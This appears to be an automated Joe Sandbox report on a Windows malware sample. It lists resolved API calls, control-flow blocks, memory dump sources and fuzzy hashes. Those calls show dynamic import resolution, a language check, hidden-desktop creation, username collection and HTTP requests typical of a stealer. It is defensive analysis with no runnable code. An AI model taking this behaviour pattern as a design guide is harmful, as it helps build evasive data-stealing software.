                                    control_flow_graph 633 8e6710-8e6717 634 8e6b2e-8e6bc2 LoadLibraryA * 8 633->634 635 8e671d-8e6b29 GetProcAddress * 43 633->635 636 8e6c38-8e6c3f 634->636 637 8e6bc4-8e6c33 GetProcAddress * 5 634->637 635->634 638 8e6c45-8e6cfd GetProcAddress * 8 636->638 639 8e6d02-8e6d09 636->639 637->636 638->639 640 8e6d7f-8e6d86 639->640 641 8e6d0b-8e6d7a GetProcAddress * 5 639->641 642 8e6d8c-8e6e14 GetProcAddress * 6 640->642 643 8e6e19-8e6e20 640->643 641->640 642->643 644 8e6e26-8e6f3b GetProcAddress * 12 643->644 645 8e6f40-8e6f47 643->645 644->645 646 8e6fbd-8e6fc4 645->646 647 8e6f49-8e6fb8 GetProcAddress * 5 645->647 648 8e6fc6-8e6fec GetProcAddress * 2 646->648 649 8e6ff1-8e6ff8 646->649 647->646 648->649 650 8e6ffa-8e7020 GetProcAddress * 2 649->650 651 8e7025-8e702c 649->651 650->651 652 8e711d-8e7124 651->652 653 8e7032-8e7118 GetProcAddress * 10 651->653 654 8e7126-8e717d GetProcAddress * 4 652->654 655 8e7182-8e7189 652->655 653->652 654->655 656 8e719e-8e71a5 655->656 657 8e718b-8e7199 GetProcAddress 655->657 658 8e71a7-8e71fe GetProcAddress * 4 656->658 659 8e7203 656->659 657->656 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00525750), ref: 008E6725
                                    • GetProcAddress.KERNEL32(74DD0000,00525730), ref: 008E673D
                                    • GetProcAddress.KERNEL32(74DD0000,00539658), ref: 008E6756
                                    • GetProcAddress.KERNEL32(74DD0000,00539670), ref: 008E676E
                                    • GetProcAddress.KERNEL32(74DD0000,00539688), ref: 008E6786
                                    • GetProcAddress.KERNEL32(74DD0000,005396A0), ref: 008E679F
                                    • GetProcAddress.KERNEL32(74DD0000,0052B900), ref: 008E67B7
                                    • GetProcAddress.KERNEL32(74DD0000,0053D340), ref: 008E67CF
                                    • GetProcAddress.KERNEL32(74DD0000,0053D460), ref: 008E67E8
                                    • GetProcAddress.KERNEL32(74DD0000,0053D298), ref: 008E6800
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2C8), ref: 008E6818
                                    • GetProcAddress.KERNEL32(74DD0000,005259F0), ref: 008E6831
                                    • GetProcAddress.KERNEL32(74DD0000,00525850), ref: 008E6849
                                    • GetProcAddress.KERNEL32(74DD0000,00525770), ref: 008E6861
                                    • GetProcAddress.KERNEL32(74DD0000,005257B0), ref: 008E687A
                                    • GetProcAddress.KERNEL32(74DD0000,0053D250), ref: 008E6892
                                    • GetProcAddress.KERNEL32(74DD0000,0053D3B8), ref: 008E68AA
                                    • GetProcAddress.KERNEL32(74DD0000,0052B9A0), ref: 008E68C3
                                    • GetProcAddress.KERNEL32(74DD0000,00525970), ref: 008E68DB
                                    • GetProcAddress.KERNEL32(74DD0000,0053D490), ref: 008E68F3
                                    • GetProcAddress.KERNEL32(74DD0000,0053D268), ref: 008E690C
                                    • GetProcAddress.KERNEL32(74DD0000,0053D3E8), ref: 008E6924
                                    • GetProcAddress.KERNEL32(74DD0000,0053D4A8), ref: 008E693C
                                    • GetProcAddress.KERNEL32(74DD0000,005259B0), ref: 008E6955
                                    • GetProcAddress.KERNEL32(74DD0000,0053D280), ref: 008E696D
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2B0), ref: 008E6985
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2E0), ref: 008E699E
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2F8), ref: 008E69B6
                                    • GetProcAddress.KERNEL32(74DD0000,0053D310), ref: 008E69CE
                                    • GetProcAddress.KERNEL32(74DD0000,0053D430), ref: 008E69E7
                                    • GetProcAddress.KERNEL32(74DD0000,0053D328), ref: 008E69FF
                                    • GetProcAddress.KERNEL32(74DD0000,0053D358), ref: 008E6A17
                                    • GetProcAddress.KERNEL32(74DD0000,0053D400), ref: 008E6A30
                                    • GetProcAddress.KERNEL32(74DD0000,0053A470), ref: 008E6A48
                                    • GetProcAddress.KERNEL32(74DD0000,0053D370), ref: 008E6A60
                                    • GetProcAddress.KERNEL32(74DD0000,0053D418), ref: 008E6A79
                                    • GetProcAddress.KERNEL32(74DD0000,00525870), ref: 008E6A91
                                    • GetProcAddress.KERNEL32(74DD0000,0053D448), ref: 008E6AA9
                                    • GetProcAddress.KERNEL32(74DD0000,00525990), ref: 008E6AC2
                                    • GetProcAddress.KERNEL32(74DD0000,0053D388), ref: 008E6ADA
                                    • GetProcAddress.KERNEL32(74DD0000,0053D478), ref: 008E6AF2
                                    • GetProcAddress.KERNEL32(74DD0000,00525A30), ref: 008E6B0B
                                    • GetProcAddress.KERNEL32(74DD0000,00525CF0), ref: 008E6B23
                                    • LoadLibraryA.KERNEL32(0053D3A0,008E067A), ref: 008E6B35
                                    • LoadLibraryA.KERNEL32(0053D3D0), ref: 008E6B46
                                    • LoadLibraryA.KERNEL32(0053D4C0), ref: 008E6B58
                                    • LoadLibraryA.KERNEL32(0053D4D8), ref: 008E6B6A
                                    • LoadLibraryA.KERNEL32(0053D4F0), ref: 008E6B7B
                                    • LoadLibraryA.KERNEL32(0053D208), ref: 008E6B8D
                                    • LoadLibraryA.KERNEL32(0053D220), ref: 008E6B9F
                                    • LoadLibraryA.KERNEL32(0053D238), ref: 008E6BB0
                                    • GetProcAddress.KERNEL32(75290000,00525DF0), ref: 008E6BCC
                                    • GetProcAddress.KERNEL32(75290000,0053D6B8), ref: 008E6BE4
                                    • GetProcAddress.KERNEL32(75290000,00539108), ref: 008E6BFD
                                    • GetProcAddress.KERNEL32(75290000,0053D658), ref: 008E6C15
                                    • GetProcAddress.KERNEL32(75290000,00525B10), ref: 008E6C2D
                                    • GetProcAddress.KERNEL32(734C0000,0052B9C8), ref: 008E6C4D
                                    • GetProcAddress.KERNEL32(734C0000,00525CB0), ref: 008E6C65
                                    • GetProcAddress.KERNEL32(734C0000,0052B928), ref: 008E6C7E
                                    • GetProcAddress.KERNEL32(734C0000,0053D6A0), ref: 008E6C96
                                    • GetProcAddress.KERNEL32(734C0000,0053D688), ref: 008E6CAE
                                    • GetProcAddress.KERNEL32(734C0000,00525D70), ref: 008E6CC7
                                    • GetProcAddress.KERNEL32(734C0000,00525E10), ref: 008E6CDF
                                    • GetProcAddress.KERNEL32(734C0000,0053D5F8), ref: 008E6CF7
                                    • GetProcAddress.KERNEL32(752C0000,00525DD0), ref: 008E6D13
                                    • GetProcAddress.KERNEL32(752C0000,00525B30), ref: 008E6D2B
                                    • GetProcAddress.KERNEL32(752C0000,0053D670), ref: 008E6D44
                                    • GetProcAddress.KERNEL32(752C0000,0053D5B0), ref: 008E6D5C
                                    • GetProcAddress.KERNEL32(752C0000,00525AF0), ref: 008E6D74
                                    • GetProcAddress.KERNEL32(74EC0000,0052B630), ref: 008E6D94
                                    • GetProcAddress.KERNEL32(74EC0000,0052B810), ref: 008E6DAC
                                    • GetProcAddress.KERNEL32(74EC0000,0053D508), ref: 008E6DC5
                                    • GetProcAddress.KERNEL32(74EC0000,00525B50), ref: 008E6DDD
                                    • GetProcAddress.KERNEL32(74EC0000,00525C30), ref: 008E6DF5
                                    • GetProcAddress.KERNEL32(74EC0000,0052B9F0), ref: 008E6E0E
                                    • GetProcAddress.KERNEL32(75BD0000,0053D5E0), ref: 008E6E2E
                                    • GetProcAddress.KERNEL32(75BD0000,00525BD0), ref: 008E6E46
                                    • GetProcAddress.KERNEL32(75BD0000,00539218), ref: 008E6E5F
                                    • GetProcAddress.KERNEL32(75BD0000,0053D598), ref: 008E6E77
                                    • GetProcAddress.KERNEL32(75BD0000,0053D5C8), ref: 008E6E8F
                                    • GetProcAddress.KERNEL32(75BD0000,00525C50), ref: 008E6EA8
                                    • GetProcAddress.KERNEL32(75BD0000,00525C10), ref: 008E6EC0
                                    • GetProcAddress.KERNEL32(75BD0000,0053D610), ref: 008E6ED8
                                    • GetProcAddress.KERNEL32(75BD0000,0053D568), ref: 008E6EF1
                                    • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 008E6F07
                                    • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 008E6F1E
                                    • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 008E6F35
                                    • GetProcAddress.KERNEL32(75A70000,00525CD0), ref: 008E6F51
                                    • GetProcAddress.KERNEL32(75A70000,0053D550), ref: 008E6F69
                                    • GetProcAddress.KERNEL32(75A70000,0053D520), ref: 008E6F82
                                    • GetProcAddress.KERNEL32(75A70000,0053D628), ref: 008E6F9A
                                    • GetProcAddress.KERNEL32(75A70000,0053D538), ref: 008E6FB2
                                    • GetProcAddress.KERNEL32(75450000,00525E30), ref: 008E6FCE
                                    • GetProcAddress.KERNEL32(75450000,00525C70), ref: 008E6FE6
                                    • GetProcAddress.KERNEL32(75DA0000,00525C90), ref: 008E7002
                                    • GetProcAddress.KERNEL32(75DA0000,0053D580), ref: 008E701A
                                    • GetProcAddress.KERNEL32(6F070000,00525AB0), ref: 008E703A
                                    • GetProcAddress.KERNEL32(6F070000,00525B70), ref: 008E7052
                                    • GetProcAddress.KERNEL32(6F070000,00525D50), ref: 008E706B
                                    • GetProcAddress.KERNEL32(6F070000,0053D640), ref: 008E7083
                                    • GetProcAddress.KERNEL32(6F070000,00525B90), ref: 008E709B
                                    • GetProcAddress.KERNEL32(6F070000,00525D30), ref: 008E70B4
                                    • GetProcAddress.KERNEL32(6F070000,00525BB0), ref: 008E70CC
                                    • GetProcAddress.KERNEL32(6F070000,00525BF0), ref: 008E70E4
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 008E70FB
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 008E7112
                                    • GetProcAddress.KERNEL32(75AF0000,0053D148), ref: 008E712E
                                    • GetProcAddress.KERNEL32(75AF0000,00539178), ref: 008E7146
                                    • GetProcAddress.KERNEL32(75AF0000,0053D1D8), ref: 008E715F
                                    • GetProcAddress.KERNEL32(75AF0000,0053CFC8), ref: 008E7177
                                    • GetProcAddress.KERNEL32(75D90000,00525E50), ref: 008E7193
                                    • GetProcAddress.KERNEL32(6CE70000,0053CF20), ref: 008E71AF
                                    • GetProcAddress.KERNEL32(6CE70000,00525D10), ref: 008E71C7
                                    • GetProcAddress.KERNEL32(6CE70000,0053CFE0), ref: 008E71E0
                                    • GetProcAddress.KERNEL32(6CE70000,0053CFF8), ref: 008E71F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: 0WR$0ZR$0[R$0\R$0]R$0^R$CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$PWR$PXR$P[R$P\R$P]R$P^R$pWR$pXR$pYR$p[R$p\R$p]R
                                    • API String ID: 2238633743-2570387859
                                    • Opcode ID: c2cf499d9ceb66457c353495423a93ed37e132f92b97f8634b3ff54c35403784
                                    • Instruction ID: 17af9910b4255d8a33efd51c199ff075a5241e6d4cb93b70f5a4b4e2ec7ffaa8
                                    • Opcode Fuzzy Hash: c2cf499d9ceb66457c353495423a93ed37e132f92b97f8634b3ff54c35403784
                                    • Instruction Fuzzy Hash: 3262F7B5A11200AFD754DFE5EC88A377BBAF7886413108919E956C3364DF38A843DF68
                                    APIs
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF32E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF34C
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF357
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF371
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF37C
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF396
                                    • lstrcpy.KERNEL32(00000000,008F5568), ref: 008DF3BE
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF3EC
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF422
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF454
                                    • lstrlen.KERNEL32(005258B0), ref: 008DF476
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF506
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF52B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF5E2
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DF894
                                    • lstrlen.KERNEL32(00539258), ref: 008DF8C2
                                    • lstrcpy.KERNEL32(00000000,00539258), ref: 008DF8EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF912
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF966
                                    • lstrcpy.KERNEL32(00000000,00539258), ref: 008DFA28
                                    • lstrcpy.KERNEL32(00000000,00539148), ref: 008DFA58
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DFAB7
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DFBD5
                                    • lstrlen.KERNEL32(00539268), ref: 008DFC03
                                    • lstrcpy.KERNEL32(00000000,00539268), ref: 008DFC30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DFC53
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DFCA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: df00d7047b76f3bcb5c4d1b481c1f24eced4ecec8f0a3a0a3612335d8be5e3b6
                                    • Instruction ID: 6ea95fb7249c81b4cb17a5b0b25b560e62b831ea56ede185b8cbeafdb25762b4
                                    • Opcode Fuzzy Hash: df00d7047b76f3bcb5c4d1b481c1f24eced4ecec8f0a3a0a3612335d8be5e3b6
                                    • Instruction Fuzzy Hash: 1CA22B709016428FC724DF69D848B2ABBE5FF84314F18867EE54ACB3A2DB35D842DB51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E022F
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0250
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0285
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0290
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E02C5
                                    • lstrlen.KERNEL32(008ED014), ref: 008E02D0
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0305
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0321
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0356
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0361
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0393
                                    • lstrlen.KERNEL32(008ED014), ref: 008E039E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E03CA
                                    • lstrlen.KERNEL32(008ED014), ref: 008E03F5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0421
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: 0XR$XS$fplugins
                                    • API String ID: 367037083-271862425
                                    • Opcode ID: 8868131ce4ac8f142522f6c02b0d84fd11ad843f0739581e51a82585709fcaf4
                                    • Instruction ID: 285e0b1e9eea1bc93f4d5acc8a840460fea434bd83bfb33d8553e260220bf9f8
                                    • Opcode Fuzzy Hash: 8868131ce4ac8f142522f6c02b0d84fd11ad843f0739581e51a82585709fcaf4
                                    • Instruction Fuzzy Hash: 74D23770A012458FCB24DF6AC888BA9BBB0FF09314F5985ADD408DB292DB75DD86CF51

                                    Control-flow Graph (legend: Executed / Not Executed; function blocks 8e1bd0-8e1e36, rendered graph not reproduced in text)
                                    APIs
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532308), ref: 008E6419
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005324D0), ref: 008E6432
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532500), ref: 008E644A
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532218), ref: 008E6462
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00539128), ref: 008E647B
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005259D0), ref: 008E6493
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005258D0), ref: 008E64AB
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532410), ref: 008E64C4
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532230), ref: 008E64DC
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532248), ref: 008E64F4
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532470), ref: 008E650D
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00525A50), ref: 008E6525
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532440), ref: 008E653D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E1C0F
                                    • GetUserDefaultLangID.KERNEL32 ref: 008E1C15
                                    • ExitProcess.KERNEL32 ref: 008E1C38
                                    • ExitProcess.KERNEL32 ref: 008E1C67
                                    • lstrlen.KERNEL32(005391F8), ref: 008E1C74
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1C9B
                                    • lstrcat.KERNEL32(00000000,005391F8), ref: 008E1CA3
                                    • lstrlen.KERNEL32(008F5160), ref: 008E1CAE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CCE
                                    • lstrcat.KERNEL32(00000000,008F5160), ref: 008E1CDA
                                    • lstrlen.KERNEL32(00000000), ref: 008E1CE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D0F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D1A
                                    • lstrlen.KERNEL32(008F5160), ref: 008E1D25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D42
                                    • lstrcat.KERNEL32(00000000,008F5160), ref: 008E1D4E
                                    • lstrlen.KERNEL32(00000000), ref: 008E1D5D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D7F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D8A
                                      • Part of subcall function 008E29E0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A0F
                                      • Part of subcall function 008E29E0: RtlAllocateHeap.NTDLL(00000000), ref: 008E2A16
                                      • Part of subcall function 008E29E0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 008E2A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1DB0
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 008E1DE4
                                    • CloseHandle.KERNEL32(00000000), ref: 008E1DF1
                                    • Sleep.KERNEL32(00001770), ref: 008E1DFC
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 008E1E0A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008E1E1B
                                    • CloseHandle.KERNEL32(00000000), ref: 008E1E2E
                                    • ExitProcess.KERNEL32 ref: 008E1E36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$lstrcpy$lstrcatlstrlen$Process$EventExit$CloseHandleHeapOpenUser$AllocateCreateDefaultLangNameSleep
                                    • String ID:
                                    • API String ID: 4175272417-0
                                    • Opcode ID: 435e053df291bbb19a74951d01c1d8a2596f27ef6258999d1bf700a5bc533538
                                    • Instruction ID: f6faff40c96a5d1afdf5e29d2d0ad1ae7a15fc36e8cae1733c77a7c9d8f26ce7
                                    • Opcode Fuzzy Hash: 435e053df291bbb19a74951d01c1d8a2596f27ef6258999d1bf700a5bc533538
                                    • Instruction Fuzzy Hash: A3615831A0064AABCB21ABF59C8DF7F7A79FF46741F144028F905D62A1DF749806CB62

                                    Control-flow Graph (legend: Executed / Not Executed; function blocks 8c6b80-8c6e20, rendered graph not reproduced in text)
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6BAF
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6C02
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C6C15
                                    • StrCmpCA.SHLWAPI(?,0053E908), ref: 008C6C2D
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008C6C55
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0053E370,00000000,00000000,-00400100,00000000), ref: 008C6C90
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008C6CB7
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008C6CC6
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008C6CE5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008C6D3F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6D9B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008C6DBD
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6DCE
                                    • InternetCloseHandle.WININET(?), ref: 008C6DD8
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C6E03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
